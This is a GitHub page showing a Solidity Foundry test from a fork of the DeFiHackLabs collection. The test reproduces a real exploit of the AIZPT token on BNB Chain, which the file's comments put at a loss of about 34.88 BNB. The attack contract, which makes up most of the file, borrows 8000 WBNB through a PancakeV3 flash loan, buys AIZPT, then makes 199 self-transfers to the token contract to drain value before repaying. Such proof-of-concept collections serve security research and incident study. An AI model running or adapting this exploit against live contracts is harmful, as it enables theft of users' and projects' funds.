forked from SunWeb3Sec/DeFiHackLabs
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathAIZPTToken_exp.sol
86 lines (68 loc) · 2.4 KB
/
AIZPTToken_exp.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 34.88 BNB (~$20K USD)
// Attacker : https://bscscan.com/address/0x3026c464d3bd6ef0ced0d49e80f171b58176ce32
// Attack Contract : https://bscscan.com/address/0x8408497c18882bfb61be9204cfff530f4ee18320
// Vulnerable Contract : https://bscscan.com/address/0xbe779d420b7d573c08eee226b9958737b6218888
// Attack Tx : https://bscscan.com/tx/0x5e694707337cca979d18f9e45f40e81d6ca341ed342f1377f563e779a746460d
// @POC Author : [rotcivegaf](https://twitter.com/rotcivegaf)
// Contracts involved
address constant PancakeV3Pool = 0x36696169C63e42cd08ce11f5deeBbCeBae652050;
address constant BUSDT = 0x55d398326f99059fF775485246999027B3197955;
address constant weth = 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c;
address constant AIZPT = 0xBe779D420b7D573C08EEe226B9958737b6218888;
contract AIZPTToken_exp is Test {
address attacker = makeAddr("attacker");
function setUp() public {
vm.createSelectFork("bsc", 42846998 - 1);
}
function testPoC() public {
vm.startPrank(attacker);
AttackerC attackerC = new AttackerC();
vm.label(address(attackerC), "attackerC");
attackerC.attack();
console.log('Final balance in wBNB :', IERC20(weth).balanceOf(attacker));
}
}
contract AttackerC {
function attack() external {
IFS(PancakeV3Pool).flash(
address(this),
0,
8000 ether,
""
);
IERC20(weth).transfer(
msg.sender,
IERC20(weth).balanceOf(address(this))
);
}
function pancakeV3FlashCallback(
uint256 fee0,
uint256 fee1,
bytes calldata data
) external {
IFS(weth).withdraw(8000 ether);
AIZPT.call{value: 8000 ether}("");
for (uint256 i; i < 199; ++i) {
IERC20(AIZPT).transfer(AIZPT, 3837275 ether);
}
IFS(weth).deposit{value: address(this).balance}();
IERC20(weth).transfer(PancakeV3Pool, 8004100000000000000000);
}
receive() external payable{}
}
interface IFS is IERC20 {
// PancakeV3Pool
function flash(
address recipient,
uint256 amount0,
uint256 amount1,
bytes calldata data
) external;
// WETH
function withdraw(uint256) external;
function deposit() external payable;
}